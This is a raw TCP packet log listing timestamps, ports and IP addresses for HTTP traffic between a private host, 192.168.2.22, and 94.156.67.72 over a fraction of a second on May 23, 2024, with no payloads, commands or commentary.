May 23, 2024 20:21:05.907866955 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.907907963 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.908921003 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.908957005 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.908977032 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.908999920 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.910501003 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.910537004 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.910557032 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.910578012 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.912024975 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.912060976 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.912081957 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.912097931 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.914556980 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.914594889 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.914614916 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.914630890 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.914634943 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.914671898 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.915117025 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.915153027 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.915168047 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.915194988 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.916667938 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.916703939 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.916724920 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.916739941 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.918121099 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.918157101 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.918188095 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.918200016 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.919627905 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.919666052 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.919686079 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.919699907 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.919706106 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.919740915 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.921132088 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.921166897 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.921185970 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.921207905 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.922544956 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.922580004 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.922600031 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.922612906 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.922621012 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.922653913 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.923939943 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.923974991 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.923995018 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.924015999 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.927828074 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.927864075 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.927894115 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.927901983 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.929059982 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.929095984 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.929107904 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.929130077 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.929140091 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.929169893 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.930293083 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.930327892 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.930342913 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.930361032 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.931509018 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.931544065 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.931565046 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.931575060 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.932702065 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.932735920 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.932753086 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.932780027 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.933887005 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.933922052 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.933943987 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.933954000 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.933964968 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.933996916 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.934999943 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.935035944 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.935056925 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.935071945 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.936162949 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.936197042 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.936220884 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.936228991 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.936233997 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.936275005 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.937289953 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.937325001 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.937345028 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.937366962 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.938345909 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.938380003 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.938399076 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.938425064 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.939404964 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.939439058 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.939461946 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.939469099 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.939501047 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.939620018 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.940412998 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.940445900 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.940460920 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.940509081 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.941426992 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.941476107 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.941499949 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.941509962 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.941519976 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.941550016 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.942393064 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.942447901 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.944375992 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.944412947 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.944438934 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.944451094 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.946573973 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.946609974 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.946635962 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.946645021 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.946645975 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.946681976 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.946688890 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.946715117 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.946765900 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.947166920 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.947201967 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.947218895 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.947242975 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.948050022 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.948086023 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.948112965 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.948122025 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.948952913 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.948987961 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.949018002 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.949028015 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.949803114 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.949837923 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.949858904 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.949875116 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.950712919 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.950748920 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.950767994 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.950783014 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.950789928 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.950822115 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.951518059 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.951553106 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.951571941 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.951595068 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.951607943 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.951647997 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.952363968 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.952399969 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.952419996 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.952441931 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.953231096 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.953265905 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.953289032 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.953423977 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.954092026 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.954128027 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.954149008 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.954169035 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.954857111 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.954891920 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.954910040 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.954926014 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.954931974 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.954967022 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.955638885 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.955673933 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.955693960 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.955713987 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.956403017 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.956437111 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.956464052 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.956473112 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.957160950 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.957195044 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.957215071 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.957236052 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.957892895 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.957928896 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.957938910 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.957969904 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.958647966 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.958683014 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.958702087 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.958717108 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.958722115 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.958756924 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.959379911 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.959414959 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.959431887 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.959456921 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.960105896 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.960139990 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.960159063 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.960186958 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.960824966 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.960859060 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.960876942 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.960889101 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.960900068 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.960930109 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.961523056 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.961556911 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.961576939 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.961591005 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.961597919 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.961632013 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.962194920 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.962229013 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.962291956 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.962908983 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.962943077 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.962963104 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.962985992 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.963545084 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.963578939 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.963598013 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.963615894 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.964267015 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.964302063 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.964320898 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.964334965 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.964340925 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.964374065 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.964376926 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.964418888 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.965233088 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.965266943 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.965286016 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.965301991 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.965306997 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.965343952 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.966181040 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.966214895 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.966229916 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.966250896 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.966254950 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.966289997 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.967137098 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.967170954 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.967189074 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.967204094 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.967221975 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.967257977 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.968060017 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.968095064 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.968115091 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.968123913 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.968139887 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.968161106 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.968164921 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.968202114 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.968981981 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.969016075 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.969027996 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.969050884 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.969050884 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.969094038 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.969877005 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.969911098 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.969928026 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.969945908 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.969949961 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.969983101 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.969986916 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.970021009 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.970735073 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.970771074 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.970787048 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.970804930 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.970809937 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.970845938 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.971616030 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.971652031 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.971671104 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.971679926 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.971685886 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.971725941 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.972461939 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.972496033 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.972515106 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.972531080 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.972534895 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.972567081 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.972574949 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.972605944 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.973284006 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.973319054 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.973350048 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.973352909 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.973359108 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.973392010 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.974030972 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.974065065 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.974087000 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.974100113 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.974107027 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.974143028 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.974781990 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.974844933 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.975087881 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.975121021 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.975141048 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.975151062 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.975161076 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.975188017 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.975195885 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.975223064 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.975225925 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.975259066 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.975264072 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.975297928 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.976072073 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.976083994 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.976094961 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.976108074 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.976119041 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.976134062 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.976134062 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.977082014 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.977119923 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.977140903 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.977154970 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.977155924 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.977190971 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.977197886 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.977231026 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.978027105 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.978063107 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.978085995 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.978096008 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.978110075 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.978137970 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.978466034 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.978513956 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.978683949 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.978718996 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.978733063 CEST	49169	80	192.168.2.22	94.156.67.72
